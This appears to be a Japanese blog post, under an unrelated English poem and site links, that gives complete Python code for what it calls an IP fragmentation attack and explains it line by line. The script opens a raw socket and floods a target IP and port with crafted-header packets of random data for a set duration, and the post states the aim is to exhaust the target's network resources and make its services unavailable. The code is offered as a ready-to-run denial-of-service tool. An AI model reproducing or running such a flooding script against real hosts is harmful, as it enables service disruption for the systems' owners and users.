banner
andrewji8

Being towards death

Heed not to the tree-rustling and leaf-lashing rain, Why not stroll along, whistle and sing under its rein. Lighter and better suited than horses are straw sandals and a bamboo staff, Who's afraid? A palm-leaf plaited cape provides enough to misty weather in life sustain. A thorny spring breeze sobers up the spirit, I feel a slight chill, The setting sun over the mountain offers greetings still. Looking back over the bleak passage survived, The return in time Shall not be affected by windswept rain or shine.
telegram
twitter
github

PythonのIPセグメント攻撃の詳細

画像

python 完全なコード:

import socket
import random
import struct
import time

def ip_frag(target_ip, target_port, duration):
    # 生のソケットを作成する
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)

    # ランダムなデータを生成する
    data = random._urandom(1024)

    # IPヘッダを設定する
    ip_header = struct.pack('!BBHHHBBH4s4s', 69, 0, 28, random.randint(0, 65535), 0, 64, socket.IPPROTO_TCP, 0, socket.inet_aton(target_ip), socket.inet_aton(target_ip))

    # データを送信する
    timeout = time.time() + duration
    sent_packets = 0
    while time.time() < timeout:
        sock.sendto(ip_header + data, (target_ip, target_port))
        sent_packets += 1

    # ソケットを閉じる
    sock.close()

    # 送信されたデータパケットの数を返す
    return sent_packets

# 攻撃対象のIPとポート
target_ip = "192.168.1.1"
target_port = 5000

# 攻撃の持続時間(秒)
duration = 10

# 攻撃を開始する
sent_packets = ip_frag(target_ip, target_port, duration)

# 攻撃結果を出力する
print("攻撃完了、送信されたデータパケット数:{}".format(sent_packets))

このスクリプトは Python で書かれています。それは生のソケットを作成し、IP フラグメントパケットを送信して対象の IP とポートに攻撃します。

まず、スクリプトは socket、random、struct、time などの必要なモジュールをインポートします。次に、target_ip、target_port、duration を引数として受け取る ip_frag という名前の関数を定義します。

関数の内部では、生のソケットオブジェクトを作成し、生の IP パケットを送信するために使用します。次に、random モジュールを使用してランダムなデータを生成し、攻撃データの内容として使用します。

次に、struct モジュールを使用して IP ヘッダデータをパックします。IP ヘッダは、IP パケットを識別およびルーティングするためのさまざまなフィールドを含むバイナリデータです。ここでは、struct.pack 関数を使用して特定の形式で IP ヘッダのフィールドをバイナリデータにパックします。

その後、攻撃データパケットを送信するためのループがあります。ループは攻撃の持続時間内でデータパケットを継続的に送信します。送信する際には、IP ヘッダとランダムなデータパケットを組み合わせて、sock.sendto 関数を使用してターゲットの IP とポートに送信します。同時に、送信されたデータパケットの数を記録します。

最後に、攻撃が終了した後、ソケットを閉じて送信されたデータパケットの数を返します。

スクリプトの最後の部分はメインプログラムです。メインプログラムでは、攻撃対象の IP とポート、および攻撃の持続時間を指定します。次に、ip_frag 関数を呼び出して攻撃を実行し、送信されたデータパケットの数を出力します。

このスクリプトは生のソケットを使用して IP フラグメントパケットを送信し、特定の対象 IP アドレスとポートに対して攻撃します。それはデータパケットを継続的に送信することで、対象ホストのネットワークリソースを消費し、対象ホストのネットワークサービスが利用できなくなる可能性があります。

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。